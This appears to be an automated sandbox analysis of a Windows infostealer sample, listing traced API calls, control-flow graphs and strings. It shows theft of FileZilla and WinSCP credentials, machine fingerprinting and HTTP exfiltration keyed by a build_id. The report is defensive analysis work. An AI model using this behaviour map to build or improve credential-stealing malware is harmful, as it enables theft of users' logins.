                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                      • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                      • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                                                                      • Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
                                                                                                                                                                      • Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
                                                                                                                                                                      • Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
                                                                                                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                    • lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,bb7310eab4245006f125c442da2d1e50,",build_id,00437814,------), ref: 00405C67
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00405C7A
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00405C99
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00405CA6
                                                                                                                                                                    • _memmove.LIBCMT ref: 00405CB4
                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
                                                                                                                                                                    • _memmove.LIBCMT ref: 00405CD6
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00405CE4
                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
                                                                                                                                                                    • _memmove.LIBCMT ref: 00405D05
                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
                                                                                                                                                                    • HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
                                                                                                                                                                    • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
                                                                                                                                                                    • InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00405E46
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                                                                    • String ID: ------$"$"$"$"$--$------$------$------$------$ERROR$ERROR$bb7310eab4245006f125c442da2d1e50$block$build_id$file_data

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                      • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                      • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                      • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                      • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                      • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                                    • strtok_s.MSVCRT ref: 0040E77E
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00436912,0043690F,0043690E,0043690D), ref: 0040E7C4
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040E7EA
                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040E829
                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040E862
                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040E89B
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040E901
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040E915
                                                                                                                                                                    • lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D
                                                                                                                                                                      • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                      • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 0040E1B7
                                                                                                                                                                    • _memset.LIBCMT ref: 0040E1D7
                                                                                                                                                                    • _memset.LIBCMT ref: 0040E1E8
                                                                                                                                                                    • _memset.LIBCMT ref: 0040E1F9
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
                                                                                                                                                                    • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E276
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E29D
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
                                                                                                                                                                    • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
                                                                                                                                                                    • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                                                                    • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 568 405f39-405ffe call 410519 call 404ab6 call 4104e7 * 5 InternetOpenA StrCmpCA 583 406000 568->583 584 406006-40600c 568->584 583->584 585 406012-40619c call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 584->585 586 4066ff-406727 InternetCloseHandle call 408048 584->586 585->586 662 4061a2-4061dc HttpOpenRequestA 585->662 591 406766-4067ec call 402920 * 4 call 401cde call 402920 call 41d016 586->591 592 406729-406761 call 410549 call 410609 call 41058d call 402920 586->592 592->591 663 4061e2-4061e8 662->663 664 4066f3-4066f9 InternetCloseHandle 662->664 665 406206-406690 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 427050 lstrlenA * 2 call 427050 lstrlenA HttpSendRequestA 663->665 666 4061ea-406200 InternetSetOptionA 
663->666 664->586 809 4066d2-4066ea InternetReadFile 665->809 666->665 810 406692-40669a 809->810 811 4066ec-4066ed InternetCloseHandle 809->811 810->811 812 40669c-4066cd call 410609 call 41058d call 402920 810->812 811->664 812->809
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                      • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                      • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                                                                    • lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,bb7310eab4245006f125c442da2d1e50,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040660C
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040661E
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040662B
                                                                                                                                                                    • _memmove.LIBCMT ref: 00406639
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00406647
                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
                                                                                                                                                                    • _memmove.LIBCMT ref: 00406662
                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 004066ED
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 004066F9
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00406705
                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                    • String ID: "$"$"$------$------$------$------$bb7310eab4245006f125c442da2d1e50$build_id$mode

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 912 418643-418653 call 41859a 915 418844-4188a1 LoadLibraryA * 5 912->915 916 418659-41883f call 407d47 GetProcAddress * 20 912->916 918 4188a3-4188b0 GetProcAddress 915->918 919 4188b5-4188bc 915->919 916->915 918->919 920 4188e7-4188ee 919->920 921 4188be-4188e2 GetProcAddress * 2 919->921 923 4188f0-4188fd GetProcAddress 920->923 924 418902-418909 920->924 921->920 923->924 925 41890b-418918 GetProcAddress 924->925 926 41891d-418924 924->926 925->926 928 418926-41894a GetProcAddress * 2 926->928 929 41894f 926->929 928->929
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00418684
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 0041869B
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 004186B2
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 004186C9
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 004186E0
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 004186F7
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 0041870E
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00418725
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 0041873C
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00418753
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 0041876A
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00418781
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00418798
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 004187AF
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 004187C6
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 004187DD
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 004187F4
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 0041880B
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00418822
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00418839
                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041884A
                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041885B
                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041886C
                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041887D
                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041888E
                                                                                                                                                                    • GetProcAddress.KERNEL32(75B30000,004184C2), ref: 004188AA
                                                                                                                                                                    • GetProcAddress.KERNEL32(751E0000,004184C2), ref: 004188C5
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 004188DC
                                                                                                                                                                    • GetProcAddress.KERNEL32(76910000,004184C2), ref: 004188F7
                                                                                                                                                                    • GetProcAddress.KERNEL32(75670000,004184C2), ref: 00418912
                                                                                                                                                                    • GetProcAddress.KERNEL32(77310000,004184C2), ref: 0041892D
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00418944
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2238633743-0

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    control_flow_graph 930 413b86-4145a5 call 4104e7 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410cc0 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4115d4 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411684 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4109a2 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 GetCurrentProcessId call 41224a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410b30 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411807 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411997 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410c85 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410c53 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411563 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410ddb call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410cc0 call 410609 call 41058d call 
402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410d2e call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410f51 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411007 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410fba call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411119 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411192 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4114a5 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411203 call 4105c7 call 41058d call 402920 * 2 call 411203 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 401cfd lstrlenA call 4104e7 call 416e97 call 402920 * 2 call 401cde
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                      • Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
                                                                                                                                                                      • Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
                                                                                                                                                                      • Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
                                                                                                                                                                      • Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16
                                                                                                                                                                      • Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
                                                                                                                                                                      • Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                                                                                      • Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                                                                                      • Part of subcall function 004115D4: RegCloseKey.ADVAPI32(?,?,?,?), ref: 00411657
                                                                                                                                                                      • Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                                                                                      • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                                                                      • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                                                                                      • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                                                                      • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                                                                                      • Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                                                                                      • Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                                                                                      • Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB
                                                                                                                                                                      • Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                                                                                      • Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                                                                                      • Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                                                                                      • Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                                                                                      • Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                                                                                      • Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                                                                                      • Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                                                                                      • Part of subcall function 00411807: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                                                                                      • Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                                                                                      • Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                                                                                      • Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                                                                                      • Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                                                                                      • Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
